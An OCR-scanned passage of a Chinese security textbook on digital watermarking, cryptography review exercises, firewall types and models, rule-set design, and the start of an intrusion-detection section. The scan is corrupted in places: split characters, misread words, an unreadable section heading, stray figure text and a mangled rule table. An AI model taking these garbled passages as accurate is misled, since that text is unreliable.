印信 息 丢 失 或 被 破坏 的 能 力 。 处 理 操作 包括 : 模糊 .几何 变形 、 放 缩 、. 压 缩 、 格 式 变换 、 剪 
切 .D/A 和 A/D 转 换 等 。 攻 击 操作 包括 : 有 损 压 缩 、 多 拷贝 联合 攻击 、 剪 切 攻击 、 解 释 攻 
击 等 。 

3. 安全 性 

安全 性 指 水 印信 息 隐 藏 的 位 置 及 内 容 不 为 人 所 知 ,这 需要 采用 隐蔽 的 算法 ,以 及 对 水 印 
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进行 预 处 理 ( 如 加 密 ) 等 措施 。 
4.6.3 数字 水 印 的 应 用 领域 


多 媒体 通信 业务 和 Internet 数 字 化 、 网 络 化 ?的 迅猛 发 展 给 信息 的 广泛 传播 提供 了 前 
所 未 有 的 便利 ,各 种 形式 的 多 媒体 作品 包括 视频 、 音 频 、 动 画 、 图 像 等 纷纷 以 网 络 形式 发 布 ， 
但 副作用 也 十 分 明显 ,任何 人 都 可 以 通过 网 络 轻 易 地 取得 他 人 的 原始 作品 ,尤其 是 数字 化 图 
像 .音乐 .电影 等 ,甚至 不 经 作者 的 同意 而 任意 复制 .修改 ,从 而 侵害 了 创作 者 的 著作 权 。 随 
着 数字 水 印 技术 的 发 展 ,数字 水 印 的 应 用 领域 也 得 到 了 扩展 ,数字 水 印 的 基本 应 用 领域 是 版 
权 保护 、 隐 藏 标识 .认证 和 安全 不 可 见 通信 。 

当 数 字 水 印 应 用 于 版 权 保护 时 ,应 用 市 场 主要 是 电子 商务 ,在线 或 离线 地 分 发 多 媒体 内 
容 以 及 大 规模 的 广播 服务 。 数 字 水 印 用 于 隐藏 标识 时 ,可 在 医学 制图、 数字 成 像 .数字 图 像 
监控 、 多 媒体 索引 和 基于 内 容 的 检索 等 领域 得 到 应 用 。 数 字 水 印 的 认证 方面 主要 应 用 于 ID 
卡 、 信 用 卡 `.ATM 卡 等 。 数 字 水 印 的 安全 不 可 见 通信 将 在 国防 和 情报 部 门 得 到 广泛 的 应 
用 。 多 媒体 技术 的 飞速 发 展 和 Internet 的 普及 带 来 了 一 系列 政治 、 经 济 、 军 事 和 文化 问题 ， 
数字 水 印 的 应 用 领域 包括 以 下 5 个 方面 。 

1. 数字 作品 的 知识 产权 保护 

数字 作品 (如 电脑 美术 .扫描 图 像 .数字 音乐 ,视频 .三 维 动画 ) 的 版 权 保护 是 当前 的 热点 
问题 。 由 于 数字 作品 的 复制 .修改 非常 容易 ,而 且 可 以 做 到 与 原作 完全 相同 ,所 以 原创 者 不 
得 不 采用 一 些 严重 损害 作品 质量 的 办 法 来 加 上 版 权 标志 ,而 这 种 明显 可 见 的 标志 很 容易 被 
X. 

“数字 水 印 ” 利 用 数据 隐藏 原理 使 版 权 标志 不 可 见 或 不 可 听 , 既 不 损害 原作 品 ,又 达到 了 
版 权 保 护 的 目的 。 目 前 ,用 于 版 权 保护 的 数字 水 印 技术 已 经 进入 了 初步 实用 化 阶段 ,IBM 
公司 在 其 “数字 图 书馆 ”软件 中 就 提供 了 数字 水 印 功能 , Adobe 公司 也 在 其 著名 的 
Photoshop 软件 中 集成 了 Digimarc 公司 的 数字 水 印 插件 。 

2. 商务 交易 中 的 票据 防伪 

随 着 高 质量 图 像 输 入 输出 设备 的 发 展 ,特别 是 精度 超过 1200dpi 的 彩色 喷 墨 .激光 打印 
机 和 高 精度 彩色 复印 机 的 出 现 , 使 得 货币 ,支票 以 及 其 他 票据 的 伪造 变 得 更 加 容易 。 另 一 方 
面 ,在 从 传统 商务 向 电子 商务 转化 的 过 程 中 ,会 出 现 大 量 过 渡 性 的 电子 文件 ,如 各 种 纸 质 票 
据 的 扫描 图 像 等 。 即 使 在 网 络 安全 技术 成 熟 以 后 ,各 种 电子 票据 也 还 需要 一 些 非 密码 的 认 
证 方式 。 数 字 水 印 技术 可 以 为 各 种 票据 提供 不 可 见 的 认证 标志 ,从 而 大 大 增加 了 伪造 的 
难度 。 

3. 证 件 真 伪 鉴 别 

信息 隐藏 技术 可 以 应 用 的 范围 很 广 ,作为 证 件 来 讲 , 每 个 人 需要 不 止 一 个 证 件 ,证 明 个 
人 身份 的 有 身份 证 .护照 .驾驶 证 .出 入 证 等 ,证 明 某 种 能 力 的 有 各 种 学 历 证 书 .资格 证 书 等 。 
国内 目前 在 证 件 防 伪 领 域 面临 巨大 的 危机 ,由 于 缺少 有 效 的 措施 ,使 得 “造假 "“ 买 假 "“ 用 
假 ? 成 风 , 已 经 严重 地 干扰 了 正常 的 经 济 秩序 ,对 国家 的 形象 也 有 不 良 影响 。 通 过 水 印 技术 
可 以 确认 该 证 件 的 真 伪 , 使 得 该 证 件 无 法 被 仿制 和 复制 。 
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4. 声 像 数据 的 隐藏 标识 和 算 改 提示 

数据 的 标识 信息 往往 比 数据 本 身 更 具有 保密 价值 ,如 遥感 图 像 的 拍摄 日 期 经 /纬度 等 。 
没有 标识 信息 的 数据 有 时 甚至 无 法 使 用 ,但 直接 将 这 些 重要 信息 标记 在 原始 文件 上 又 很 危 
险 。 数 字 水 印 技术 提供 了 一 种 隐藏 标识 的 方法 ,标识 信息 在 原始 文件 上 是 看 不 到 的 ,只 有 通 
过 特殊 的 阅读 程序 才 可 以 读 取 。 这 种 方法 已 经 被 国外 一 些 公开 的 遥感 图 像 数 据 库 所 采用 。 
此 外 ,数据 的 纂 改 提示 也 是 一 项 很 重要 的 工作 。 现 有 的 信和 号 拼接 和 镶嵌 技术 可 以 做 到 * 移 花 
接 木 ”而 不 为 人 知 , 因 此 ,如 何 防范 对 图 像 . 音 频 、 视 频数 据 的 自 改 攻击 是 重要 的 研究 课题 。 
基于 数字 水 印 的 算 改 提示 是 解决 这 一 问题 的 理想 技术 途径 ,通过 隐藏 水 印 的 状态 可 以 判断 
声 像 信 号 是 否 被 算 改 。 

5. 隐蔽 通信 及 其 对 抗 

数字 水 印 所 依赖 的 信息 隐藏 技术 不 仅 提供 了 非 密码 的 安全 途径 ,更 引发 了 信息 战 尤其 
是 网 络 情报 战 的 革命 ,产生 了 一 系列 新 颖 的 作战 方式 ,引起 了 许多 国家 的 重视 。 网 络 情报 战 
是 信息 战 的 重要 组 成 部 分 ,其 核心 内 容 是 利用 公用 网 络 进行 保密 数据 传送 。 然 而 ,经 过 加 密 
的 文件 往往 是 混乱 无 序 的 ,容易 引起 攻击 者 的 注意 。 网 络 多 媒体 技术 的 广泛 应 用 使 得 利用 
公用 网 络 进 行 保密 通信 有 了 新 的 思路 ,利用 数字 化 声 像 信 号 相对 于 人 的 视觉 \ 听 觉 元 余 , 可 
以 进行 各 种 时 /空域 和 变换 域 的 信息 隐藏 ,从 而 实现 隐蔽 通信 。 


4.6.4 FERAH E 


ER RA RF IK ENHI 77 TE A. E — E XE As (5) H 3 R R, B — AAR FEK ER A R BERI 
个 数字 水 印 提取 系统 。 数 字 水 印 的 嵌入 过 程 如 图 4-15 所 示 。 
水 印 W 


载体 数据 1 加 入 水 印 后 的 数据 1 
密 钥 K 
4-15 数字 水 印 的 嵌入 过 程 


该 系统 的 输入 是 水 印 .载体 数据 和 一 个 可 选择 的 公 钥 或 者 私 钥 。 水 印 可 以 是 任何 形式 
的 数据 ,比如 数值 ,文本 或 者 图 像 等 。 密 钥 可 用 来 加 强 安全 性 ,以 避免 未 授权 方 算 改 数字 水 
印 。 所 有 的 数字 水 印 系统 至 少 应 该 使 用 一 个 密 钥 ,有 的 甚至 是 几 个 密 钥 的 组 合 。 当 数字 水 
印 与 公 钥 或 私 钥 结合 时 ,嵌入 水 印 的 技术 通常 分 别称 为 私 钥 数字 水 印 技术 和 公 钥 数字 水 印 
技术 ,数字 检测 过 程 如 图 4-16 所 示 。 


水 印 W 或 者 原 载体 数据 1 
测试 数据 1 水 印 检测 算法 水 印 W 或 可 信 度 值 


密 钥 K 


4-16 数字 水 印 的 检测 过 程 
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习 题 4 

一 、 填空 题 

1. 数字 水 印 应 具有 三 个 基本 特性 : 隐藏 性 、 和 

2. 按 密 钥 方式 划分 ,把 密码 分 为 和 

3. 密码 的 基本 功能 包括 š 8 : 

4. 对 称 算法 中 加 密 密 钥 和 解密 密 钥 ` 公 开 密 钥 算 法 中 加 密 密 钥 和 解密 密 
4 š 

5. DES 算法 的 入口 参数 有 三 个 : Key, Data, Mode, HP Key 为 ,是 DES 算 
法 的 工作 密 钥 ; Data 为 。 ,是 要 被 加 密 或 被 解密 的 数据 , Mode 为 DES 的 工作 方式 ， 
有 两 种 : 或 。 

6. S 盒 的 工作 原理 是 

7. RSA 公开 密 钥 密码 体制 是 一 种 基于 的 公 钥 体系 ,在 公开 密 钥 密码 体制 中 ， 
加 密 密 钥 是 信息 ,而 解密 密 钥 是 。 加 密 算 法 和 解密 算法 也 都 是 _。 

8. PGP 加 密 系统 是 采用 与 相 结 合 的 一 种 加 密 技术 。 

二 、 简 答题 


l. 数字 信封 的 原理 是 什么 ? 
2. 什么 是 数字 签名 ? 数字 签名 的 特点 是 什么 ? 
3. 什么 是 数字 水 印 ? 应 用 在 哪些 方面 ? 


第 5 章 防火墙 与 人 侵 检 测 


Wo 掌握 防火 墙 和 入 侵 检测 的 定义 .设置 。 
Wo 掌握 分 组 过 滤 防 火 墙 的 定义 、 入 侵 检 测 系 统 的 步骤 。 
图 了 解 防火 墙 系 统 模型 了 解 入 侵 检 测 系统 的 方法 。 


5.1 Bj 火 墙 


5.1.1 防火 墙 的 概念 


防火 墙 (Firewall) 是 一 套 协 助 确保 信息 安全 的 设备 ,会 依照 特定 的 规则 ,人 允许 或 是 限制 
传输 的 数据 通过 。 防 火 墙 可 以 是 一 台 专 属 的 硬件 也 可 以 是 架设 在 一 般 硬件 上 的 一 套 软件 。 
因此 ,所 谓 防 火 墙 指 的 是 一 个 由 软件 和 硬件 设备 组 合 而 成 在 内 部 网 和 外 部 网 之 间 、 专 用 网 
与 公共 网 之 间 的 界面 上 构造 的 保护 屏障 ,是 一 种 获取 安全 性 方法 的 形象 说 法 。 它 是 一 种 计 
算 机 硬件 和 软件 的 结合 ,使 Internet 5 Intranet 之 间 建 立 起 一 个 安全 网 关 (Security 
Gateway) ,从 而 保护 内 部 网 免 受 非法 用 户 的 侵入 。 防 火 墙 主 要 由 服务 访问 规则 、 验 证 工具 、 
包 过 滤 和 应 用 网 关 4 个 部 分 组 成 。 局 域 网 内 部 的 计算 机 流入 流出 的 所 有 网 络 通信 和 数据 包 
均 要 经 过 内 部 防火 墙 。 

在 网 络 中 ,所 谓 “ 防 火 墙 ", 是 指 一 种 将 内 部 网 和 公众 访问 网 (如 Internet) 分 开 的 方法 ， 
它 实 际 上 是 一 种 隔离 技术 。 防 火 墙 是 在 两 个 网 络 通 信 时 执行 的 一 种 访问 控制 尺度 , 它 能 允 
许 你 “同意 ”的 人 和 数据 进入 你 的 网 络 , 同 时 将 你 “不 同意 ”的 人 和 数据 拒 之 门 外 , 最 大 限度 地 
阻止 网 络 中 的 黑客 来 访问 你 的 网 络 。 换 句 话说 ,如 果 不 通过 防火 墙 ,公司 内 部 的 人 就 无 法 访 
là] Internet. Internet. 上 的 人 也 无 法 和 公司 内 部 的 人 进行 通信 。 

Windows XP 系统 相 比 于 以 往 的 Windows 系统 新 增 了 许多 的 网 络 功能 (Windows 7 的 
防火 墙 一 样 很 强大 ,可 以 很 方便 地 定义 过 滤 掉 数据 包 ) ,例如 Internet 连接 防火 墙 CICF) , 它 
就 是 用 一 段 “ 代 码 墙 ? 把 电脑 和 Internet 分 隔 开 ,时 刻 检查 出 和 防火墙 的 所 有 数据 包 ,决定 拦 
截 或 是 放行 哪些 数据 包 。 防 火 墙 可 以 是 一 种 硬件 .固件 或 者 软件 ,例如 专用 防火 墙 设备 就 是 
硬件 形式 的 防火 墙 , 包 过 滤 路 由 器 是 嵌 有 防火 墙 固 件 的 路 由 器 ,而 代理 服务 器 等 软件 就 是 软 
件 形 式 的 防火 墙 。 

5.1.2. 防火 墙 的 分 类 

常见 的 防火 墙 有 三 种 类 型 : 分 组 过 滤 防 火 墙 ,应 用 代理 防火 墙 , 状 态 检测 防火 墙 。 

1. 分 组 过 滤 防 火 墙 

分 组 过 滤 防 火 墙 作用 在 协议 组 的 网 络 层 和 传输 层 , 可 视 为 一 种 IP 封包 过 滤器 ,运作 在 


底层 的 TCP/IP 协议 堆栈 上 。 我 们 可 以 以 枚 举 的 方式 ,只 允许 符合 特定 规则 的 封包 通过 ,其 
余 的 一 概 禁 止 穿 越 防火 墙 。 这 些 规则 通常 可 以 由 管理 员 定义 或 修改 ,根据 分 组 包头 源 地 址 、 
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目的 地 址 和 端口 号 .协议 类 型 等 标志 确定 是 否 人 允许 数据 包 通过 ,只 有 满足 过 滤 逻 辑 的 数据 包 
才 被 转发 到 相应 的 目的 地 的 出 口 端 ,其 余 的 数据 包 则 从 数据 流 中 丢弃 。 

建立 防火 墙 规 则 集 的 基本 方法 有 两 种 :“ 明 示 禁 止 (exclusive) 型 "和 “明示 人 允许 
Cinclusive) 型 ”。 明 示 禁 止 的 防火 墙 规则 ,默认 允许 所 有 数据 通过 防火 墙 ,而 这 种 规则 集中 
定义 的 , 则 是 不 允许 通过 防火 墙 的 流量 。 换 言 之 ,与 这 些 规 则 不 匹配 的 数据 ,全 部 是 允许 通 
过 防火 墙 的 。 明 示人 允许 的 防火 墙 正好 相反 , 它 只 允许 符合 集中 定义 规则 的 流量 通过 ,而 其 他 
所 有 的 流量 都 被 阻止 。 

明示 人 允许 型 防火 墙 能 够 提供 对 于 传 出 流量 更 好 的 控制 ,这 使 其 更 适合 那些 直接 对 
Internet 公 网 提供 服务 的 系统 的 需要 。 它 也 能 够 控制 来 自 Internet 公 网 到 您 的 私有 网 络 的 
访问 类 型 。 所 有 和 规则 不 匹配 的 流量 都 会 被 阻止 并 记录 在 案 。 一 般 来 说 明示 允许 防火 墙 要 
比 明示 禁止 防火 墙 更 安全 ,因为 它们 显著 地 减少 了 允许 不 希望 的 流量 通过 可 能 造成 的 风险 。 
例如 : 定义 的 防火 墙 的 规则 集 如 表 5-1 所 示 。 

表 5-1 防火 墙 规则 的 定义 


1 人 允许 10.1.1.1 * * * TCP 
2 允许 * 10:1. 1.1 20 * TCP 
3 禁止 * 10. 1.1.1 20 «1024 TCP 


第 一 条 规则 : 主机 10. 1. 1. 1 任何 端口 访问 任何 主机 的 任何 端口 ,基于 TCP 协议 的 数 
据 包 都 允许 通过 。 

第 二 条 规则 : 任何 主机 的 20 端口 访问 主机 10.1.1.1 的 任何 端口 ,基于 TCP 协议 的 数 
据 包 允许 通过 。 

第 三 条 规则 : 任何 主机 的 20 端口 访问 主机 10. 1. 1. 1 小 于 1024 的 端口 ,如 果 基 于 TCP 
协议 的 数据 包 都 禁止 通过 。 

示例 : 用 WinRoute Firewall 5 创建 包 过 滤 规 则 ,如 第 9 章 实验 十 一 所 示 。 

WinRoute 这 个 软件 则 除了 具有 代理 服务 器 的 功能 外 ,还 具有 防火 墙 `NAT .邮件 服务 器 、 
DHCP 服务 器 .DNS 服务 器 等 功能 ,应 用 比较 广泛 ,目前 比较 常用 的 是 WinRouteFirewall 5, 安 
装 文件 如 图 5-1 所 示 。 

WinRouteFirewall 5 不 仅仅 是 一 个 防火 墙 软件 ,也 具有 病毒 防护 的 功能 ,可 以 帮 你 监控 
HTTP and FTP 联机 进出 是 否 有 危害 的 病毒 。 

2. 应 用 代理 防火 墙 (Application Proxy) 

应 用 代理 防火 墙 也 叫 应 用 网 关 (Application Gateway), 它 作用 在 应 用 层 ,其 特点 是 完全 
“阻隔 ”网 络 通信 流 , 通 过 对 每 种 应 用 服务 编制 专门 的 代理 程序 ,实现 监视 和 控制 应 用 层 通 信 
流 的 作用 ,实际 中 的 应 用 网 关 通 常 由 专用 工作 站 实现 。 

应 用 代理 是 运行 在 防火 墙 上 的 一 种 服务 器 程序 ,防火 墙 主机 可 以 是 一 个 具有 两 个 网 络 
接口 的 双重 宿主 主机 ,也 可 以 是 一 个 堡垒 主 机 。 

代理 服务 器 被 放置 在 内 部 服务 器 和 外 部 服务 器 之 间 ,用 于 转 接 内 外 主机 之 间 的 通信 , 它 
可 以 根据 安全 策略 来 决定 是 否 为 用 户 进行 代理 服务 。 代 理 服 务 器 运行 在 应 用 层 , 因 此 又 被 
称 为 “应 用 网 关 ”。 例 如 : 一 个 应 用 代理 可 以 限制 FTP 用 户 只 能 够 从 Internet 上 获取 文件 ， 
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Kerio WinKoute Firewall 


Welcome to the InstallShield Wizard for Kerio 
WinRoute Firewall 5.0.0 RC 4 


The InztalShield? Wizard will install Kerio WinRoute 
Firewall 5.0.0 RC 4 on your computer. To continue, click 
Next 


5-1 WinRoutcFirewall 5 的 安装 


而 不 能 将 文件 上 载 到 Internet 上 。 

3. 状态 检测 (Status Detection) 

直接 对 分 组 里 的 数据 进行 处 理 , 并 且 结合 前 后 分 组 的 数据 进行 综合 判断 ,然后 决定 是 否 
允许 该 数据 包 通 过 。 


5.1.3. 常见 防火 墙 系统 模型 


常见 防火 墙 系统 一 般 按照 4 种 模型 构建 : 筛选 路 由 器 模型 . 单 宿 主 堡垒 主机 (屏蔽 主机 
防火 墙 ) 模 型 `, 双 宿主 堡垒 主机 模型 (屏蔽 防火 墙 系统 模型 ) 和 屏蔽 子 网 模型 。 

(1) 筛选 路 由 器 模型 是 网 络 的 第 一 道 防线 ,功能 是 实施 包 过 滤 。 创 建 相 应 的 过 滤 策 略 
时 对 工作 人 员 的 TCP/IP 的 知识 有 相当 的 要 求 , 如 果 筛 选 路 由 器 被 黑客 攻破 那么 内 部 网 络 
将 变 得 十 分 的 危险 。 该 防火 墙 不 能 够 隐藏 你 的 内 部 网 络 的 信息 ,不 具备 监视 和 日 志 记录 功 
能 。 典 型 的 筛选 路 由 器 模型 如 图 5-2 所 示 。 


进行 包 过 滤 


图 5-2 筛选 路 由 器 模型 
(2) 单 宿主 堡垒 主机 (屏蔽 主机 防火 墙 ) 模 型 由 包 过 滤 路 由 器 和 堡垒 主机 组 成 。 该 防火 


墙 系统 提供 的 安全 等 级 比 包 过 滤 防 火 墙 系统 要 高 ,因为 它 实现 了 网 络 层 安全 ( 包 过 滤 ) 和 应 
用 层 安全 (代理 服务 )。 所 以 人 侵 者 在 破坏 内 部 网 络 的 安全 性 之 前 ,必须 首先 渗透 两 种 不 同 
的 安全 系统 。 单 宿主 堡垒 主机 的 模型 如 图 5-3 所 示 。 堡 人 垒 主机 在 内 部 网 络 和 外 部 网 络 之 
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间 , 具 有 防御 进攻 的 功能 ,通常 充当 网 关 服务 。 优 点 是 安全 性 比较 高 ,但 是 增加 了 成 本 开销 
和 降低 了 系统 性 能 ,并 且 对 内 部 计算 机 用 户 也 会 产生 影响 。 


安全 区 域 
TI BAPC 打印 机 
Q 


id HH 


不 准 访问 除 堡 双 主机 以 外 的 主机 
只 允许 外 部 与 堡垒 主机 通信 


查找 对 应 的 策略 


QE 
防火 墙 


tlt Cinese 
53 SPEREN 


(3) 双 宿 主 堡垒 主机 模型 (屏蔽 防火 墙 系统 ) 可 以 构造 更 加 安全 的 防火 墙 系统 。 双 宿主 
堡垒 主机 有 两 种 网 络 接口 ,但 是 主机 在 两 个 端口 之 间 直 接 转 发 信息 的 功能 被 关 掉 了 。 在 物 
理 结构 上 强行 让 所 有 去 往 内 部 网 络 的 信息 经 过 堡垒 主机 。 双 宿主 堡垒 主机 模型 如 图 5-4 所 
示 。 由 于 堡垒 主机 是 唯一 能 从 外 部 网 上 直接 访问 的 内 部 系统 ,所 以 有 可 能 受到 攻击 的 主机 
就 只 有 堡垒 主机 本 身 。 但 是 ,如 果 人 允许 用 户 注册 到 保 垒 主机 ,那么 整个 内 部 网 络 上 的 主机 都 

受到 攻击 的 威胁 ,所 以 一 般 禁 止 用 户 注册 到 堡垒 主机 。 
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(4) 屏蔽 子 网 模型 用 了 两 个 包 过 滤 路 由 器 和 一 个 堡 侄 主机。 它 是 最 安全 的 防火 墙 系统 
之 一 ,因为 在 定义 了 “中 立 区 ”(Demilitarized Zone,DMZ) 网 络 后 , 它 支 持 网 络 层 和 应 用 层 安 
全 功能 。 网 络 管理 员 将 堡垒 主机 、 信 息 服 务 器 .Modem 组 以 及 其 他 公用 服务 器 放 在 DMZ 
网 络 中 。 如 果 黑 客 想 突破 该 防火 墙 那 么 必须 攻破 以 上 三 个 单独 的 设备 ,屏蔽 子 网 模型 如 
图 5-5 所 示 。 

妈 难 点 说 明 : 堡垒 主机 是 一 种 被 强化 的 可 以 防御 进攻 的 计算 机 ,作为 进入 内 部 网 络 的 
一 个 检查 点 ,以 达到 把 整个 网 络 的 安全 问题 集中 在 某 个 主机 上 解决 ,从 而 省 时 省 力 , 不 用 考 
虑 其 他 主机 的 安全 的 目的 。 
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AEHL Intemet 上! 服务 器 
图 5-5 屏蔽 子 网 模型 


堡垒 主机 是 网 络 中 最 容易 受到 侵害 的 主机 ,所 以 堡垒 主机 也 必须 是 自身 保护 最 完善 的 
主机 。 一 个 堡垒 主机 使 用 两 块 网 卡 ,每 个 网 卡 连接 不 同 的 网 络 。 一 块 网 卡 连 接 公 司 的 内 部 
网 络 ,用 来 管理 .控制 和 保护 ,而 另 一 块 连接 另 一 个 网 络 ,通常 是 公 网 也 就 是 Internet。 

一 个 路 由 器 控制 Intranet 数据 流 , 另 一 个 控制 Internet 数据 流 , Intranet 和 Internet 均 
可 访问 屏蔽 子 网 ,但 禁止 它们 穿 过 屏蔽 子 网 通信 。 可 根据 需要 在 屏蔽 子 网 中 安装 保 圣 主机， 
为 内 部 网 络 和 外 部 网 络 的 互相 访问 提供 代理 服务 ,但 是 来 自 两 网 络 的 访问 都 必须 通过 两 个 
包 过 滤 路 由 器 的 检查 。 

对 于 向 Internet 公开 的 服务 器 , 像 WWW.FTP, Mail 等 Internet 服务 器 也 可 安装 在 屏 
蔽 子 网 内 ,这样 无 论 是 外 部 用 户 ,还 是 内 部 用 户 都 可 访问 。 这 种 结构 的 防火 墙 安全 性 能 高 ， 
具有 很 强 的 抗 攻 击 能 力 ,但 需要 的 设备 多 ,造价 高 。 


5.1.4. 建立 防火 墙 的 步骤 


建立 一 个 可 靠 的 规则 集 对 于 实现 一 个 成 功 的 、 安 全 的 防火 墙 来 说 是 非常 关键 的 一 步 。 
因为 如 果 你 的 防火 墙 规则 集 配 置 错误 ,再 好 的 防火 墙 也 只 是 摆设 。 在 安全 审计 中 ,经常 能 看 
到 一 个 巨 资 购 入 的 防火 墙 由 于 某 个 规则 配置 的 错误 而 将 系统 暴露 于 巨大 的 危险 之 中 。 

成 功 地 创建 一 个 防火 墙 系统 一 般 需 要 以 下 6 步 。 

第 一 步 : 制定 安全 策略 

防火 墙 和 防火 墙 规则 集 只 是 安全 策略 的 技术 实现 。 管 理 层 规定 实施 什么 样 的 安全 策 
略 , 防 火 墙 是 策略 得 以 实施 的 技术 工具 。 所 以 ,在 建立 规则 集 之 前 ,我 们 必须 首先 理解 安全 
策略 ,假设 它 包 含 以 下 三 方面 内 容 : 

(1) 内 部 雇员 访问 Internet 不 受 限制 。 

(2) 规定 Internet 用 户 有 权 使 用 公司 的 Web Server 和 Internet E-mail; 

(3) 任何 进入 公用 内 部 网 络 的 通话 必须 经 过 安全 认证 和 加 密 。 

显然 ,大 多 数 机 构 的 安全 策略 要 远 远 比 这 复杂 ,根据 单位 的 实际 情况 制定 安全 策略 。 

第 二 步 : 搭建 安全 体系 结构 

作为 一 个 网 络 管理 员 ,要 将 安全 策略 转化 为 安全 体系 结构 。 安 全 策略 规定 “Internet 用 
户 有 权 使 用 公司 的 Web Server 和 Internet E-mail”。 由 于 任何 人 都 能 访问 Web 和 E-mail 
服务 器 ,所 以 这 些 服务 器 是 不 安全 的 。 通 过 把 它们 放 入 DMZ Gemilitarized Zone, 中 立 区 ) 
来 实现 该 项 策略 。 

第 三 步 : 制定 规则 次 序 

在 建立 规则 集 之 前 ,需要 注意 规则 次 序 。 哪 条 规则 放 在 哪 条 之 前 是 非常 关键 的 。 同 样 
的 规则 ,以 不 同 的 次 序 放 置 , 可 能 会 完全 改变 防火 墙 的 运转 情况 。 很 多 防火 墙 ( 例 如 
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SunScreen EFS,Cisco IOS,FW-1 等 ) 以 顺序 方式 检查 信息 包 , 当 防火 墙 接收 到 一 个 信息 包 
时 , 它 先 与 第 一 条 规则 相 比 较 , 然 后 是 第 二 条 、 第 三 条 …… 当 它 发 现 一 条 匹配 规则 时 ,就 停止 
检查 并 应 用 那 条 规则 。 如 果 信 息 包 经 过 每 一 条 规则 而 没有 发 现 匹 配 , 这 个 信息 包 便 会 被 拒 
绝 。 一 般 来 说 ,通常 的 顺序 是 , 较 特殊 的 规则 在 前 , 较 普通 的 规则 在 后 ,防止 在 找到 一 个 特殊 
规则 之 前 一 个 普通 规则 便 被 匹配 ,这 可 以 使 你 的 防火 墙 避免 配置 错误 。 

第 四 步 : 落实 规则 集 

选 好 素材 就 可 以 建立 规则 集 了 ,下面 就 简要 概述 每 条 规则 。 

。 切断 默认 

通常 在 默认 情况 下 需要 切断 默认 性 能 。 

。 允许 内 部 出 网 

允许 内 部 网 络 的 任何 人 出 网 ,与 安全 策略 中 所 规定 的 一 样 ,所 有 的 服务 都 被 许可 。 

。 添加 锁定 

添加 锁定 规则 ,阻塞 对 防火 墙 的 任何 访问 ,这 是 所 有 规则 集 都 应 有 的 一 条 标准 规则 , 除 
了 防火 墙 管理 员 ,任何 人 都 不 能 访问 防火 墙 。 

。 丢弃 不 匹配 的 信息 包 

在 默认 情况 下 ,丢弃 所 有 不 能 与 任何 规则 匹配 的 信息 包 。 但 这 些 信息 包 并 没有 被 记录 。 
把 它 添加 到 规则 集 末 尾 来 改变 这 种 情况 ,这 是 每 个 规则 集 都 应 有 的 标准 规则 。 

。 丢弃 并 不 记录 

通常 网 络 上 大 量 被 防火 墙 丢 弃 并 记录 的 通信 通话 会 很 快 将 日 志 填 满 。 我 们 创立 一 条 规 
则 丢弃 或 拒绝 这 种 通话 但 不 记录 它 。 这 是 一 条 你 需要 的 标准 规则 。 

* 允许 DNS 访问 

允许 Internet 用 户 访问 我 们 的 DNS 服务 器 。 

* 允许 邮件 访问 

允许 Internet 和 内 部 用 户 通过 SMTP( 简 单 邮件 传递 协议 ) 访 问 我 们 的 邮件 服务 器 。 

* 允许 Web 访问 

允许 Internet 和 内 部 用 户 通 过 HTTP( 服 务 程序 所 用 的 协议 ) 访 问 我 们 的 Web 服务 器 。 

* 阻塞 DMZ 

禁止 内 部 用 户 公开 访问 DMZ 区 。 

。 允许 内 部 的 POP 访问 

允许 内 部 用 户 通 过 POP( 邮 局 协议 ) 访 问 邮 件 服务 器 。 

。 强化 DMZ 的 规则 

DMZ 应 该 从 不 启动 与 内 部 网 络 的 连接 。 如 果 DMZ 不 能 这 样 做 ,就 说 明 它 是 不 安全 
的 。 这 里 应 该 加 上 一 条 规则 ,只 要 有 从 DMZ 到 内 部 用 户 的 通话 , 它 就 会 发 出 拒绝 、 做 记录 
并 发 出 警告 。 

。 允许 管理 员 访 问 

允许 管理 员 ( 受 限于 特殊 的 资源 IP) 以 加 密 方式 访问 内 部 网 络 。 

。 提高 性 能 

只 要 有 可 能 ,就 应 该 把 最 常用 的 规则 移 到 规则 集 的 顶端 。 因 为 防火 墙 只 分 析 较 少数 的 
规则 ,这 样 能 提高 防火 墙 性 能 。 
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。 增加 IDS 

。 附加 规则 

第 五 步 : 更 换 控 制 

组 织 好 规则 之 后 ,应 该 写 上 注释 并 经 常 更 新 它们 。 注 释 可 以 帮助 理解 哪 条 规则 做 什么 ， 
对 规则 理解 得 越 好 ,错误 配置 的 可 能 性 就 越 小 。 对 那些 有 多 重 防 火 墙 管理 员 的 大 机 构 来 说 ， 
建议 当 规 则 被 修改 时 ,把 下 列 信息 加 入 注释 中 ,这 可 以 帮助 管理 员 跟踪 谁 修改 了 哪 条 规则 以 
及 修改 的 原因 。 

。 规 则 更 改 者 的 名 字 

。 规则 变更 的 日 期 /时 间 

。 规则 变更 的 原因 

第 六 步 : 做 好 审计 工作 

建立 好 规则 集 后 ,检测 它 很 关键 。 防 火 墙 实际 上 是 一 种 隔离 内 外 网 的 工具 。 在 
Internet 中 ,很 容易 犯 一 些 配置 上 的 错误 。 通 过 建立 一 个 可 靠 的 ,简单 的 规则 集 , 可 以 创建 
一 个 更 安全 的 、 被 防火 墙 所 隔离 的 网 络 环境 。 

需要 注意 的 是 规则 越 简单 越 好 ,一 个 简单 的 规则 集 是 建立 一 个 安全 的 防火 墙 的 关键 所 
在 。 尽 量 保持 规则 集 简洁 和 简短 ,因为 规则 越 多 ,就 越 可 能 犯错 误 , 规 则 越 少 ,理解 和 维护 就 
越 容易 。 一 个 好 的 准则 是 最 好 不 要 超过 30 条 。 一 旦 规则 超过 50 条 ,就 会 以 失败 而 告终 , 因 
为 规则 少 意味 着 只 分 析 少 数 的 规则 ,防火墙 的 CPU 周期 就 短 ,防火 墙 效率 就 可 以 提高 。 


5.2 人 侵 检 测 


入 侵 检 测 系统 (Intrusion Detection System,IDS) 是 一 种 对 网 络 传输 进行 即时 监视 ,在 
发 现 可 疑 传 输 时 发 出 警报 或 者 采取 主动 反应 措施 的 网 络 安全 系统 。 它 与 其 他 网 络 安全 系统 
的 不 同 之 处 便 在 于 ,IDS 是 一 种 积极 主动 的 安全 防护 技术 。IDS 最 早出 现在 1980 年 4 月 。 
20 世纪 80 年 代 中 期 ,IDS 逐渐 发 展 成 为 人 侵 检 测 专 家 系统 (IDES) 。1990 年 ,IDS 分 化 为 基 
于 网 络 的 IDS 和 基于 主机 的 IDS, 后 又 出 现 分 布 式 IDS。 

由 于 入 侵 检 测 系统 的 市 场 在 近 几 年 中 飞速 发 展 , 许 多 公司 投入 到 这 一 领域 上 来 。 
